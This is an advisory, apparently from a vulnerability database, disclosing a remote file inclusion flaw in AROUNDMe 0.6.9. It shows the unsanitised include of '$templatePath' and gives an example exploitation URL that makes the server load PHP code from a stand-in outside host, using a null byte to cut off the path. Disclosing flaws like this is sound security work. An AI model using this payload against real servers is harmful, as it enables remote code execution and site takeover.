AROUNDMe 0.6.9 remonte file inclusion

2006.10.30
Credit: noislet
Risk: High
Local: No
Remote: Yes
CWE: CWE-Other


Ogólna skala CVSS: 5.1/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 4.9/10
Wymagany dostęp: Zdalny
Złożoność ataku: Wysoka
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

============================================== AROUNDMe 0.6.9 remonte file inclusion vendor site: http://barnraiser.org/ vulnerable versions: 0.6.9 (and possibly older) discovered by: noislet ( http://www.noislet.org/ ) vendor informed: 21.10.2006 published: 22.10.2006 ============================================== product info: AROUNDMe is the perfect solution for you to bring people together around shared goals, activities and interests to form a shared knowledge network. ============================================== bug details: Input passed to the "$templatePath" is not verified before being used to include files. required: register_globals = On file: pol_view.tpl.php (and others) buggy code: if (isset($poll)) { ... include $templatePath . "poll_detail.inc.tpl.php"; ============================================== example exploitation: http://random.site/aroundme/template/barnraiser_01/pol_view.tpl.php?poll =1&templatePath=http://example.com/evilcode.php%00 -- noislet page http://www.noislet.org/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top